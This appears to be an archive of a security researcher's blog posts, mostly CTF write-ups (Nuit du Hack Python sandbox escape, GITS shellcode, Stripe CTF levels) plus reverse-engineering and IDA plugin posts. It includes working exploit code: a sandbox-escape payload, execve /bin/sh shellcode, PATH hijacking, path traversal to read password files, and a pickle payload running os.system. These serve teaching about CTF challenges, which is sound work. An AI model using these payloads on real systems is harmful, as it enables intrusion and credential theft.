2013
03.10

The Nuit du Hack CTF 2013 Quals round was taking place yesterday. As usual, I’ll be posting a few writeups about fun exercises and/or solutions from this CTF. If you want more, my teammate w4kfu should be posting some writeups as well on his blog soon.

TL;DR:

auth(''.__class__.__class__('haxx2',(),{'__getitem__':
lambda self,*a:'','__len__':(lambda l:l('function')( l('code')(
1,1,6,67,'d\x01\x00i\x00\x00i\x00\x00d\x02\x00d\x08\x00h\x02\x00'
'd\x03\x00\x84\x00\x00d\x04\x006d\x05\x00\x84\x00\x00d\x06\x006\x83'
'\x03\x00\x83\x00\x00\x04i\x01\x00\x02i\x02\x00\x83\x00\x00\x01z\n'
'\x00d\x07\x00\x82\x01\x00Wd\x00\x00QXd\x00\x00S',(None,'','haxx',
l('code')(1,1,1,83,'d\x00\x00S',(None,),('None',),('self',),'stdin',
'enter-lam',1,''),'__enter__',l('code')(1,2,3,87,'d\x00\x00\x84\x00'
'\x00d\x01\x00\x84\x00\x00\x83\x01\x00|\x01\x00d\x02\x00\x19i\x00'
'\x00i\x01\x00i\x01\x00i\x02\x00\x83\x01\x00S',(l('code')(1,1,14,83,
'|\x00\x00d\x00\x00\x83\x01\x00|\x00\x00d\x01\x00\x83\x01\x00d\x02'
'\x00d\x02\x00d\x02\x00d\x03\x00d\x04\x00d\n\x00d\x0b\x00d\x0c\x00d'
'\x06\x00d\x07\x00d\x02\x00d\x08\x00\x83\x0c\x00h\x00\x00\x83\x02'
'\x00S',('function','code',1,67,'|\x00\x00GHd\x00\x00S','s','stdin',
'f','',None,(None,),(),('s',)),('None',),('l',),'stdin','exit2-lam',
1,''),l('code')(1,3,4,83,'g\x00\x00\x04}\x01\x00d\x01\x00i\x00\x00i'
'\x01\x00d\x00\x00\x19i\x02\x00\x83\x00\x00D]!\x00}\x02\x00|\x02'
'\x00i\x03\x00|\x00\x00j\x02\x00o\x0b\x00\x01|\x01\x00|\x02\x00\x12'
'q\x1b\x00\x01q\x1b\x00~\x01\x00d\x00\x00\x19S',(0, ()),('__class__',
'__bases__','__subclasses__','__name__'),('n','_[1]','x'),'stdin',
'locator',1,''),2),('tb_frame','f_back','f_globals'),('self','a'),
'stdin','exit-lam',1,''),'__exit__',42,()),('__class__','__exit__',
'__enter__'),('self',),'stdin','f',1,''),{}))(lambda n:[x for x in
().__class__.__bases__[0].__subclasses__() if x.__name__ == n][0])})())

One of the exercises, called “Meow”, gave us a remote restricted Python shell with most builtins disabled:

{'int': <type 'int'>, 'dir': <built-in function dir>,
'repr': <built-in function repr>, 'len': <built-in function len>,
'help': <function help at 0x2920488>}

A few functions were available, namely kitty() displaying an ASCII cat, and auth(password). I assumed our goal was to bypass the authentication or to find the password. Unfortunately, our Python commands are passed to eval in expression mode, which means we can’t use any Python statement: no assignment, no print, no function/class definitions, etc. This makes things a lot harder to work with. We’ll have to use some Python magic (this writeup will be full of it, I promise).

I first assumed auth was simply comparing the password to a constant string. In this case, I could use a custom object with __eq__ overwritten to always return True. However, there is no trivial way to craft that object: we can’t define our own classes using the class Foo: syntax, we can’t modify an already existing object (no assignment), etc. This is where our first bit of Python magic comes into place: we can directly instantiate a type object to create a class object, then instantiate this class object. Here is how you would do it:

type('MyClass', (), {'__eq__': lambda self: True})

However, we can’t use type here: it is not defined in our builtins. We can use a second trick: every Python object has a __class__ attribute, which gives us the type of an object. For example, ''.__class__ is str. But more interesting: str.__class__ is type! Which means we can use ''.__class__.__class__ to instantiate our new type.

Unfortunately, the auth function is not simply comparing our object to a string. It’s doing a lot of other things to it: slicing it to 14 characters, taking its length via len() and calling reduce with a strange lambda as well. Without the code it’s going to be hard to guess how to make an object that behaves exactly like the function wants, and I don’t like guessing. We need more magic!

Enter code objects. Python functions are actually objects which are made of a code object and a capture of their global variables. A code object contains the bytecode of that function, as well as the constant objects it refers to, some strings and names, and other metadata (number of arguments, number of locals, stack size, mapping from bytecode to line number). You can get the code object of a function using myfunc.func_code. This is forbidden in the restricted mode of the Python interpreter, so we can’t see the code of the auth function. However, we can craft our own functions like we crafted our own types!

You might wonder: why do we need to use code objects to craft functions when we already have lambda? Simple: lambdas cannot contain statements. Random crafted functions can! For example, we can create a function that prints its argument to stdout:

ftype = type(lambda: None)
ctype = type((lambda: None).func_code)
f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,),
                (), ('s',), 'stdin', 'f', 1, ''), {})
f(42)
# Outputs 42

There is a slight problem with this though: to get the type of a code object, we need to access the func_code attribute, which is restricted. Fortunately, we can use even more Python magic to find our type without accessing forbidden attributes.

In Python, a type object has a __bases__ attribute which returns the list of all its base classes. It also has a __subclasses__ method that returns the list of all types that inherit from it. If we use __bases__ on a random type, we can reach the top of the type hierarchy (object type), then read the subclasses of object to get a list of all types defined in the interpreter:

>>> len(().__class__.__bases__[0].__subclasses__())
81

We can then use this list to find our function and code types:

>>> [x for x in ().__class__.__bases__[0].__subclasses__()
...  if x.__name__ == 'function'][0]
<type 'function'>
>>> [x for x in ().__class__.__bases__[0].__subclasses__()
...  if x.__name__ == 'code'][0]
<type 'code'>

Now that we can build any function we want, what can we do? We can’t directly access the non restricted builtins: the functions we craft are still executed in the restricted environment. We can get a non sandboxed function to call us: the auth function call the __len__ method of the object that we pass as a parameter. This is however not enough to get out of the sandbox: our globals are still the same and we can’t for example import a module. I tried to look at all the classes we could access via the __subclasses__ trick to see if we could get a reference to a useful module through there, but no dice. Even getting Twisted to call one of our crafted functions via the reactor was not enough. We could try to get a traceback object and use it to browse the stack frames of our callers, but the only trivial ways to get a traceback object are via the inspect or the sys modules which we can’t import. After being blocked on that problem, I went to work on other problems, slept a lot, and woke up to the solution I needed!

There actually is another way to get a traceback object in Python without using the standard library: context managers. They are a new feature of Python 2.6 which allow some kind of object life scoping in Python:

class CtxMan:
    def __enter__(self):
        print 'Enter'
    def __exit__(self, exc_type, exc_val, exc_tb):
        print 'Exit:', exc_type, exc_val, exc_tb

with CtxMan():
    print 'Inside'
    error

# Output:
# Enter
# Inside
# Exit: <type 'exceptions.NameError'> name 'error' is not defined
        <traceback object at 0x7f1a46ac66c8>

We can create a context manager object which will use the traceback object passed to __exit__ to display the global variables of our caller, caller which is out of the restricted environment. To do that, we use a combination of all our previous tricks. We create an anonymous type defining __enter__ as a simple lambda and __exit__ as a lambda that accesses what we want in the traceback and passes it to our print lambda (remember, we can’t use statements):

''.__class__.__class__('haxx', (),
  {'__enter__': lambda self: None,
   '__exit__': lambda self, *a:
     (lambda l: l('function')(l('code')(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S',
                                        (None,), (), ('s',), 'stdin', 'f',
                                        1, ''), {})
     )(lambda n: [x for x in ().__class__.__bases__[0].__subclasses__()
                    if x.__name__ == n][0])
     (a[2].tb_frame.f_back.f_back.f_globals)})()

We need to go deeper! Now, we need to use this context manager (that we will call ctx in our next code snippets) in a function that will purposefully raise an error in a with block:

def f(self):
    with ctx:
        raise 42

And we put f as the __len__ of our crafted object that we pass to the auth function:

auth(''.__class__.__class__('haxx2', (), {
  '__getitem__': lambda *a: '',
  '__len__': f
})())

Refer to the beginning of the article for the “real” inlined code. When ran on the server, this causes the Python interpreter to run our f function, go through the crafted context manager __exit__, which will access the globals from our caller, which contain these two interesting values:

'FLAG2': 'ICanHazUrFl4g', 'FLAG1': 'Int3rnEt1sm4de0fc47'

Two flags?! Turns out that the same service was used for two successive exercises. Double kill!

For more fun, by accessing the globals we can do more than simply reading: we can also modify the flags! Using f_globals.update({ 'FLAG1': 'lol', 'FLAG2': 'nope' }) the flags are changed until the next server restart. This was apparently not planned by the organizers.

Anyway, I still don’t know how we were supposed to solve this challenge normally, but I think this “generic” solution is a good way to introduce people to some nice Python black magic :) Use it carefully, it’s easy to get Python to segfault using crafted code objects (exploiting the Python interpreter and running an x86 shellcode via crafted Python bytecode will be left as an exercise for the reader). Thanks to the Nuit du Hack organizers for this nice exercise.

2013
02.17

MysteryBox was a remote server disassembling and running its input data for an unknown RISC-like CPU. As far as I know the unknown CPU is not a “real” CPU but a VM made solely for this challenge. Here is an example of how to interact with the remote MysteryBox service:

$ perl -e 'print "\x00\x00\x00\x00"' | 
        nc mysterybox.2013.ghostintheshellcode.com 4242
09007800  ldb sp, sp, sp
Caught signal 11.  Program terminated.
 sp=0900bc08  r1=00000000  r2=00000000  r3=00000000  r4=00000000  r5=00000000
 r6=00000000  r7=00000000  r8=00000000  r9=00000000 r10=00000000 r11=00000000
r12=00000000 r13=00000000 r14=00000000 r15=00000000 r16=00000000 r17=00000000
r18=00000000 r19=00000000 r20=00000000 r21=00000000 r22=00000000 r23=00000000
r24=00000000 r25=00000000 r26=00000000 r27=00000000 r28=00000000 r29=00000000
 lr=00000000  ip=09007800  cc=ffff

We can see the remote service disassembled our 00 00 00 00 bytes to ldb sp, sp, sp and crashed while executing it (crash dump ip points to our instruction). After playing a bit with the disassembler, I figured out how instructions were encoded, and ran a loop to get all the instructions supported by this CPU:

00000000        ldb sp, sp, sp
01000000        stb sp, sp, sp
02000000        ldbu sp, sp, sp
03000000        stbu sp, sp, sp
04000000        ldsxb sp, sp, sp
05000000        ldi sp, 0
06000000        add sp, sp, sp
07000000        mulx sp, sp, sp, sp
08000000        div sp, sp, sp
09000000        and sp, sp, sp
0a000000        shl sp, sp, sp
0b000000        syscall 0  ; SYS_restart_syscall
0c000000        ldfs f0, sp, sp
0d000000        ldfsu f0, sp, sp
0e000000        fadd f0, f0, f0
0f000000        fmod f0, f0, f0
00400000        ldh sp, sp, sp
01400000        sth sp, sp, sp
02400000        ldhu sp, sp, sp
03400000        sthu sp, sp, sp
04400000        ldsxh sp, sp, sp
05400000        ldih sp, 0
06400000        sub sp, sp, sp
07400000        imulx sp, sp, sp, sp
08400000        idiv sp, sp, sp
09400000        or sp, sp, sp
0a400000        shr sp, sp, sp
0b400000        cmplt0 sp, sp
0c400000        ldfd f0, sp, sp
0d400000        ldfdu f0, sp, sp
0e400000        fsub f0, f0, f0
0f400000        fpow f0, f0, f0
00800000        ldw sp, sp, sp
01800000        stw sp, sp, sp
02800000        ldwu sp, sp, sp
03800000        stwu sp, sp, sp
04800000        ldsxbu sp, sp, sp
05800000        jmp 0x08a3b898
06800000        addx sp, sp, sp
07800000        mul sp, sp, sp
08800000        mod sp, sp, sp
09800000        xor sp, sp, sp
0a800000        rol sp, sp, sp
0b800000        icmplt0 sp, sp
0c800000        stfs f0, sp, sp
0d800000        stfsu f0, sp, sp
0e800000        fmul f0, f0, f0
0f800000        flog f0, f0, f0
00c00000        ldmw sp, sp, sp
01c00000        stmw sp, sp, sp
02c00000        ldmwu sp, sp, sp
03c00000        stmwu sp, sp, sp
04c00000        ldsxhu sp, sp, sp
05c00000        call 0x08a3b8d8
06c00000        subx sp, sp, sp
07c00000        mov sp, sp
08c00000        imod sp, sp, sp
09c00000        sar sp, sp, sp
0ac00000        ror sp, sp, sp
0bc00000        fcmplt0 f0, f0
0cc00000        stfd f0, sp, sp
0dc00000        stfdu f0, sp, sp
0ec00000        fdiv f0, f0, f0
0fc00000        ldfi f0, sp

More details about this architecture: it is little-endian, each instruction can be made conditional (like ARM) and the result of an arithmetic operation can be shifted left by up to 16 bits. While most instructions use 3 registers, some also use one register and a 16 bit, sign-extended immediate. From there, I started to experiment a bit and wrote a simple write(4, "h", 1) shellcode:

def gen_string(s):
    instrs = []
    for i, c in enumerate(s):
        c = ord(c)
        instrs.append(0x05020000 | i) # ldi r1, [i]
        instrs.append(0x05040000 | c) # ldi r2, 
        instrs.append(0x03040020)     # stbu r2, sp, r1
    return instrs

instrs = gen_string('h')
instrs += [
    0x05020004, # ldi r1, 4
    0x07c40000, # mov r2, sp
    0x05060001, # ldi r3, 1
    0x0b000004, # syscall SYS_write
]

This works well, however our goal is to get a shell! For that, we need to execve("/bin/sh", { "/bin/sh", NULL }, NULL). But this is not enough: sh tries to communicate using standard stdin/out/err FDs (0, 1, 2). We need to write something to dup2 our socket over these FDs:

def gen_string(s):
    instrs = []
    for i, c in enumerate(s):
        c = ord(c)
        instrs.append(0x05020000 | i) # ldi r1, [i]
        instrs.append(0x05040000 | c) # ldi r2, 
        instrs.append(0x03040020)     # stbu r2, sp, r1
    return instrs

def dup2(f, g):
    return [
        0x05020000 | f, # ldi r1, [f]
        0x05040000 | g, # ldi r2, [g]
        0x0b000000 | 63 # syscall SYS_dup2
    ]

instrs = []
instrs += dup2(4, 0)
instrs += dup2(4, 1)
instrs += dup2(4, 2)
instrs += gen_string('h')
instrs += [
    0x05020001, # ldi r1, STDOUT_FILENO
    0x07c40000, # mov r2, sp
    0x05060001, # ldi r3, 1
    0x0b000004, # syscall SYS_write
]

Our write syscall is now using STDOUT_FILENO (aka. 1) and working fine, which means our dup2 calls are working. Now we need to execve our shell. This shellcode stores "/bin/sh" at address sp+16, and stores argv (aka. { sp+16, 0 }) at address sp. Note that the previous gen_string had a bug because it was using stbu (store then update the pointer) instead of stb (simply store).

def gen_string(s):
    instrs = []
    for i, c in enumerate(s):
        c = ord(c)
        instrs.append(0x05020000 | (i + 16)) # ldi r1, [i+16]
        instrs.append(0x05040000 | c) # ldi r2, 
        instrs.append(0x01040020)     # stb r2, sp, r1
    return instrs

def dup2(f, g):
    return [
        0x05020000 | f, # ldi r1, [f]
        0x05040000 | g, # ldi r2, [g]
        0x0b000000 | 63 # syscall SYS_dup2
    ]

instrs = []
instrs += dup2(4, 0)
instrs += dup2(4, 1)
instrs += dup2(4, 2)
instrs += gen_string('/bin/sh\x00')
instrs += [
    0x05020010, # ldi r1, 16
    0x06021000, # add r1, r1, sp
    0x05040004, # ldi r2, 4
    0x06042000, # add r2, r2, sp
    0x01863040, # stw r3, r3, r2
    0x07c40000, # mov r2, sp
    0x01823040, # stw r1, r3, r2
    0x0b00000b, # syscall SYS_execve
]

With our shell we can now cat key to finally solve this challenge.

2013
02.17

GITS 2013 Writeup: RTFM (re100)

rtfm-67cc5dcb69df4244bcf2d573481e6d6a06b861a3: ELF 32-bit LSB executable
rtfm-e24f03bb1204f8e3d40fae8ac135187a11b0ba5c: data

rtfm is a binary processing ASCII input files and outputting seemingly compressed versions of these files: testing on a few long text files shows that the size of the output file is smaller than the input file. The second file from this challenge is a file compressed by rtfm, our objective is to write the decompression code for the rtfm compression.

The interesting part of the binary is the function at 0x08048910, which compresses the contents of an input buffer and writes it to a calloc-ed output buffer. For each character of the input stream, the function will read data from a 128 entries table at 0x08048CA0. Each of these entry contains a 16-bit word as well as an 8-bit integer.

After reading the details of the compression algorithm and noticing how it outputs a bit stream with variable size depending on the input character, I guessed that this was most likely implementing the well known Huffman encoding algorithm. The table at 0x08048CA0 is a hardcoded mapping of input symbols to output symbols, and the output symbols seem to be unambiguous when reading the compressed stream bit by bit. From this information we can now write a simple Huffman decoder using the same table.

import struct

fp = open('bin')
fp.seek(0xca0)
descr_raw = fp.read(4 * 128)
descr = {}

for i in xrange(0, 4*128, 4):
    s = descr_raw[i:i+3]
    w, b = struct.unpack('<HB', s)
    descr[i/4] = { 'byte': b, 'word': w }

def bits(s):
    for c in s:
        n = ord(c)
        for i in xrange(8):
            yield (n & 0x80) >> 7
            n <<= 1

def decompress(buf):
    buf = buf[4:]

    ends = {}
    for i, d in enumerate(descr.values()):
        n = d['byte'] + 2
        s = bin(d['word'])[2:]
        s += ("0" * (n - len(s)))
        ends[s] = i

    out = []
    n = ""
    for i, b in enumerate(bits(buf)):
        n += str(b)
        if n in ends:
            out.append(chr(ends[n]))
            n = ""

    return ''.join(out)

if __name__ == '__main__':
    print decompress(
        open('rtfm-e24f03bb1204f8e3d40fae8ac135187a11b0ba5c').read()
    )

Decompressing the file gives us a RTF document, which contains the key: “Did I have Vari-good-code?”.

2013
02.17
hackthegibson: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), 
    dynamically linked (uses shared libs), for GNU/Linux 2.6.15,
    BuildID[sha1]=0xb8515e4280130d84d4b4e1fd492da1b099ec0eb6, stripped

hackthegibson is a 64-bit ELF for Linux using OpenSSL (libcrypto) and FFTW to analyze the spectrum of samples coming from /dev/dsp.

The program does not take a key as an input, only sound data. That means it will most likely generate and display a key based on the sound. Indeed, at the address 0x401963 we can see that the program uses MD5_Final to generate a MD5 digest and displays it in hex using a printf("%02x") loop. Let’s look at all the references to MD5_Update to understand how this MD5 digest is computed:

  • Just before the program main loop, the first call to MD5_Update hashes 1 constant byte 0x14
  • At each iteration of the program main loop, if the function analyzing the sound data returns the expected value (checked using a table mapping iteration number to expected value) MD5_Update is called using that expected value.
  • Just before the call to MD5_Final the constant byte 0x14 is hashed once again.

This second point is the most important. Basically, here is the simplified pseudocode of the program:

int expected_vals[22];

void init_expected() { // sub_400df4
    expected_vals[0] = '_';
    expected_vals[1] = '<';
    expected_vals[2] = 'P';
    // ...
    expected_vals[21] = 'G';
}

void mainloop() {
    int iter_count = 0;

    MD5_Update(0x14);
    while (iter_count < 22) {
        int ret = analyze_sound_data();
        if (ret == expected_vals[iter_count]) {
            iter_count++;
            MD5_Update(ret);
        }
     }
     MD5_Update(0x14);
     MD5_Final();
}

We can simply read all the expected values from the initialization function and compute the MD5 without even running the program! (which was lucky: it uses /dev/dsp which my system does not have…)

>>> import hashlib
>>> hashlib.md5('\x14_<P_Y5GYP<jGPY5GYP5CPG\x14').hexdigest()
'667e948a0285b25dafd2c58a2531f2c3'
2012
10.14

State of this blog

You may have noticed that I haven’t been posting a lot of articles on this blog recently.

For the last two years I’ve been spending most of my free time at LSE, the computer systems/security lab of the school I’m attending. We recently decided to open a blog dedicated to everything we do at the lab, from security contests writeups to tutorials. This means that I’m posting most of my work on that blog instead of here.

If you’re following this blog, you will probably be interested in following the LSE blog: http://blog.lse.epita.fr/

Some of my articles you may have missed:

My french readers might also be interested by the videos of 3 of my recent talks I did at our school during this year edition of LSE Summer Week. You can find the recordings on our Youtube channel.

If my studies go well I’ll be leaving LSE in 2013 for a final internship before getting my degree. I should start blogging more on this website then.

Thanks to everyone reading articles on this blog!

2012
03.22

Once upon a time, Stefan Esser from the Hitmen programmed an IDA loader plugin to be able to analyze DOL files, which is the executable format used for Gamecube and Wii. Builds are published for versions up to 5.2, but nothing more recent.

Fortunately they also released the source to their plugin, which allowed me (with some very minor modifications to the code to use linput_t instead of C FILE structures) to build a version of the IDA DOL loader plugin for IDA 6.1, the version I’m using in my day to day reverse engineering. Here is a link to this build.

Have fun with it!

That might be the shortest article I published on this blog…

2012
03.01

My Stripe CTF writeup

Recently Stripe (a startup trying to improve online payments for web developers) put online a fun CTF challenge with simple security exercises. Now that the challenge is done and the CTF is offline, I wanted to share my solutions with people who were interested in this CTF but were not able to solve it before the time limit.

Unfortunately I don’t have the original source code of the exercises here. I hope that the Stripe CTF organizers will publish those so that I can explain my exploits better :)

level01

The given binary executes system("date"); in order to display the date. system looks into the PATH environment variable to locate binaries. As an attacker, we can control PATH and make it point to a directory we control which contains a date executable file. Here is my solution:

$ ln -s /bin/sh date
$ PATH=.:$PATH /levels/level01

level02

The MOTD gives us some infos about this level: there is a web server running on localhost:80 which requires Digest authentication to access a PHP page of which we have the source. I don’t have the PHP source here but basically, it checked for the existence of a cookie, and if it exists it displays the contents of "/var/www/$cookie_value". Cookies can be manipulated by the attacker, so we can control the displayed file. Here is my solution:

$ curl -v -b user_details=../../home/level03/.password \
      -u level02:kxlVXUvzv --digest http://ctf.stri.pe/level02.php

level03

Things get a little harder. Here, we have a C binary which basically does this:

func_ptr table[4] = { func1, func2, func3, func4 };
int i = atoi(argv[1]);
if (i >= 4)
    error();
table[i]();

This code does not check if i is negative. We can use that to dereference a function pointer which was put in the stack later. It turns out we can control some part of the stack (our argv[2] is copied in a stack buffer), so it is just a matter of finding the right offset to control the function pointer dereference and finding the right function on which to jump. Luckily, one of the unused functions in the level03 binary is a wrapper for system(3) and we can use it to execute an arbitrary shell command. My solution:

/levels/level03 -27 "$(echo -ne "sh #\x5b\x87\x04\x08")"

Explanation: -27 if the offset to 4 characters after the start of the argv[2] copy, which contains our function pointer. The first 4 chars of argv[2] are the arbitrary command: sh followed by the start of a comment so that the sh binary does not freak out :)

level04

The basic example of a stack overflow: strcpy of a user controlled string without any length check. This should be trivial to exploit, but the presence of ASLR makes it a bit harder: the stack location in memory is randomized, making it hard to jump on our shellcode in the stack. To bypass that, there are two solutions: either find a jmp *%eax at a fixed address in memory (for example, in .text) and use it to overwrite the function return address so that the ret returns to the shellcode, or be hardcore and bruteforce the address. Both solutions were doable, and I went with the bruteforce because I did not think about the jmp *%eax in the first place :P .

Using stackbf2.c with the right parameters, exploiting this is trivial. Basically:

gcc brute.c
./a.out /levels/level04 1040

Note: while I was writing this article, w4kfu gave me a better solution: using ulimit -s unlimited makes the exploit possible using a ret2libc technique. Food for thought :)

level05

I still have the code of this exercise on my machine: level05.py.

For this level we have a “large” client/server Python application which uses a server to process HTTP queries, put data in a queue so that it can be processed by a worker, and get data back from the queue when it has been processed. The worker waits for data to be put in the queue, uppercases the data, then puts it back in the queue. The queue is basically a directory with “job” files in this format:

type: %s; data: %s; job: %s

Data is unserialized using this code:

parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
match = parser.match(serialized)
direction = match.group(1)
data = match.group(2)
job = pickle.loads(match.group(3))

The trick is to see that you can basically get a user controlled string for match.group(3) if you have "; job: " in your data. Python’s pickle module is not really done to unserialize user controlled stuff: it is very easy to make it do what you want as soon as you control what it unserializes.

You can control how an object is serialized using its __reduce__ method. I basically created an object with __reduce__ calling os.system("cp /home/level06/.password /tmp/1"), injected it as a “job” object into the queue, and got the password file copied where I wanted it.

level06

I also have the code for this exercise locally: level06.c

When I first saw the code I immediately thought “this must be exploited through a timing attack: count the number of characters written on stderr before data is written on stdout“. Unfortunately, it is not that easy: scheduling and pipe bufferization completely breaks all forms of basic timing you could use. I tried several methods to get the writes on stderr to block so that I could more precisely detect when the write on stdout was done, but did not manage it the first day.

Then, the day before the end of the CTF, I thought a bit more about it (I really wanted a free t-shirt :D ) and the solution came to my mind: prefilling the pipe buffer so that we can control after how much characters it blocks. That way we can see if the write on stdout was done before a certain number of characters on stderr. That way we can bruteforce one character by one character to get the full password to level06. Here is my exploit code which checks if the start of the password matches argv[1]:

import os
import signal
import sys

CONSTSIZE = 33
PIPEBUFSIZE = 65536

orig_guess = guess = sys.argv[1]

guess += "a" # because we need one more char to be sure

out, out_child = os.pipe()
err, err_child = os.pipe()
pid = os.fork()
if not pid:
    os.write(err_child, '\x00' * (65503 - len(orig_guess)))
    os.dup2(out_child, 1)
    os.dup2(err_child, 2)
    os.execl('/levels/level06', 'level06', '/home/the-flag/.password', guess)

def alarmed(*a):
    print 'Success: %r' % orig_guess
    os.kill(pid, 9)
    sys.exit(0)

signal.signal(signal.SIGALRM, alarmed)
signal.alarm(1)
os.read(out, 1)

print 'Fail: %r' % orig_guess
os.kill(pid, 9)
sys.exit(1)

Final key: theflagl0eFTtT5oi0nOTxO5

Conclusion

Overall, this was a really fun CTF organized by the guys Stripe. It’s really too bad that it was not longer (if I did not get stuck on that last exercise like an idiot I would have basically done it in 5 hours) with more complex exercises (remote exploitation is always fun, reverse engineering too :) ). Still, it’s a great learning tool for people who are not really into computer security and local exploitation, and I’d like to see more people do that kind of stuff.

2011
11.07

Earlier this week I started to work on reverse engineering code running on the Gamecube DSP, which is as far as I know a custom made CPU optimized for sound processing (mixing several sounds, decoding compressed sample formats, that kind of stuff). The Dolphin emulator has an implementation of a JIT and an interpreter for this CPU, as well as a basic disassembler and assembler used for debugging. But reverse engineering a program made of 4000 instructions using a basic disassembler which outputs a text file is really… primitive compared to the features provided by modern tools like IDA. I’ve wanted to learn more about how to write IDA plugins for a long time, so I started to work on a processor module to handle the GC/Wii DSP in IDA. I’m going to talk about how an IDA processor module is written, and some thoughts I had when writing this module (warning: rant incoming).

Result of my work on gcdsp-ida

First of all, the complete code of this module can be found on my Bitbucket account. It is written for IDA 6.1 with IDAPython and Python 2.7. For those who don’t know about it, IDAPython is a plugin for IDA which allows IDA scripting in Python using (almost) the same API as normal C modules. Some modules distributed with IDA 6.1 are programmed like that: for example, spu.py (for Sony’s PS3 SPU cores) and msp430.py (for TI MSP430 CPU) so it’s easy to go look at the code in these modules if you have a problem.

A Python processor module needs to export a function called PROCESSOR_ENTRY, which returns an instance of a subclass of idaapi.processor_t, the base class of processor module objects. The object needs to define some properties, for example a bitfield of features needed or supported by the plugin, the CPU name, all of the CPU instructions and registers, as well as the number of bits in a byte and all kind of properties like that. Four functions must also be supported:

  • ana, which stands for analyze, reads bytes at a given address and decodes them to get an instruction. The method needs to fill the cmd_t object named self.cmd and return the number of bytes read.
  • out and outop handle outputting respectively an instruction and an instruction operand. They are called after ana, with self.cmd initialized to what you set it before.
  • emu emulates the behavior of an instruction to create cross-references and code flow edges. For example, a RET instruction needs to stop the current basic block, and a CALL instruction will have a reference to another function.

That’s all you need to implement for an IDA processor module. Obviously it is not that easy, you still need to decode the ISA of your CPU and handle operands correctly, etc. There is not a lot more to tell about this so let’s talk about what I think of the IDA API now that I manipulated it a bit.

It’s crap. It kind of works, but has almost no documentation, really few examples and even the documentation can be quite misleading when you start using non conventional features. For example, to specify that your CPU manipulates big endian data, you need to guess that you have to implement notify_init and set cvar.inf.mf to True. By the way, mf means MSB First… calling the field be or big_endian would probably make too much sense. But wait, even setting mf to True is not always enough! When your CPU uses bytes with more than 8 bits (the GC DSP uses 16 bits in a byte), you also need to set cvar.inf.wide_high_byte_first to True. Note that for two fields that do almost the same thing, the two names are completely different.

Talking about names:

  • ua_add_cref
  • out_tagon
  • OutLong

These three functions are all from the IDA API. Not inconsistent enough? Let’s look at the constant names: o_void, fl_F, CF_CALL. I don’t think I have to rant more about this, it’s simply stupid and you always have to look up in the C++ header files (not the documentation, it doesn’t exist) to check how a function is written.

Some things in the IDA API clearly have been written for the x86 CPU and can’t be easily generalized for other CPUs. For example, each CPU module need to define a code segment register and a data segment register, even when segmentation makes no sense at all. I looked at the SPU and the MSP430 plugins and both of those define fake registers just to please IDA and to make it think that there is a data and code segment. Another problem like that is when your CPU has bytes with more than 8 bits. The API is completely inconsistant about when a byte means 8 bits or when a byte means the native byte of your CPU. For example, the get_full_byte function reads a native byte from your CPU, but the ua_next_byte returns an 8 bit byte. Both use the same terminology and you can’t guess what is the right one to use without trying.

I also encountered some very strange bugs when coding this plugin. For example, each cmd_t object you initialize with your ana function has a specval field you can use to store custom values in it for the emu and out functions, but it was always set to 0 in ana and emu even after setting some bits in it.

Conclusion on this experience: the IDA processor module API works quite well but has evolved without any real design decisions, leading to a big clusterfuck of randomly named functions and words that don’t mean the same thing in all occasions. I spent more time fighting with the API than coding the disassembler, and I think this is quite a problem.

2011
10.18

Non french readers: sorry for the lack of translation, this is about talks in french organized at my school :)

Le laboratoire système et sécurité d’EPITA organise mercredi 26 octobre de 20h30 à 22h en amphi 2 une session de lightning talks exposant des sujets divers relatifs aux problématiques du laboratoire, le tout en 10 à 15 minutes par présentation.

6 sujets seront présentés lors de cette session :

  • Le SMP sur x86 (Xavier Deguillard, LSE 2012)
  • PCAP et capture de traffic réseau (Gabriel Laskar, LSE 2012)
  • TLS, comment ça marche ? (Stephane Sezer, LSE 2012)
  • Merkle Trees et vérification d’integrité (Pierre Bourdon, LSE 2013)
  • Techniques d’anti-debugging sous Win32 (Samuel Chevet, LSE 2013)
  • L’allocateur SLAB (Xavier Deguillard, LSE 2012)

Adresse : 14-16 rue Voltaire, 94276 Le Kremlin-Bicêtre.

Venez nombreux !

2011
06.10

Part 1 of this article talked about how I found the bytecode files and the interpreter assembly code. Let's go further and try to understand how these bytecode files are structured.

We now have 188MB of JSON describing the CPU state when an instruction tries to access either the bytecode file in memory or the interpreter state. However, it is not readable at all:


{'type':'r', 'size':4, 'addr':'016E1964', 'val': '00007D40', 'pc':'80091DB8'
{'type':'r', 'size':4, 'addr':'016E00F4', 'val': '11000000', 'pc':'80091DBC'
{'type':'w', 'size':4, 'addr':'016E1964', 'val': '00007D44', 'pc':'80091DC8'
{'type':'r', 'size':4, 'addr':'016E0544', 'val': '00000000', 'pc':'80092720'
{'type':'r', 'size':4, 'addr':'016E053C', 'val': '816D83B4', 'pc':'80092724'
{'type':'r', 'size':4, 'addr':'016E1964', 'val': '00007D44', 'pc':'80092730'
{'type':'r', 'size':4, 'addr':'016E00F8', 'val': '00000000', 'pc':'80092734'
{'type':'w', 'size':4, 'addr':'016E1964', 'val': '00007D48', 'pc':'8009273C'

We need to enhance this by using the informations we already have on the interpreter behavior (where PC is stored, where is the instruction dispatcher, etc.). I wrote a very simple script called filter.py, which iterates on each line, loads the JSON object as a Python dict, applies a list of filters to it and prints the filtered line. Here is an example of a filter which detects lines in the dump from the instruction dispatcher:

(lambda d: d['pc'] == '80091DBC',
 'ReadInstr: %(val)s at pc=%(r3)s (@ %(pc)s)',
 'blue'),

It's a tuple with a predicate function, a format string which will be formatted using the JSON object itself, and a color which is translated to the equivalent ANSI color code (for blue, it is \e[34m). We can also write filters for instructions trying to access the script bytecode, and instructions manipulating the Program Counter (PC):

(lambda d: (int(d['addr'], 16) - 0x016E1964) % 5152 == 0
           and int(d['addr'], 16) >= 0x016E195C
           and d['type'] == 'r',
 '  GetPC: %(val)s at addr=%(addr)s (@ %(pc)s)',
 'green'),
(lambda d: (int(d['addr'], 16) - 0x016E1964) % 5152 == 0
           and int(d['addr'], 16) >= 0x016E195C
           and d['type'] == 'w',
 '  SetPC: %(val)s at addr=%(addr)s (@ %(pc)s)',
 'red'),

(lambda d: 0 <= int(d['off'], 16) < 0x8191,
 'SoAccess: type=%(type)s val=%(val)s at off=%(off)s (@ %(pc)s)',
 'yellow'),

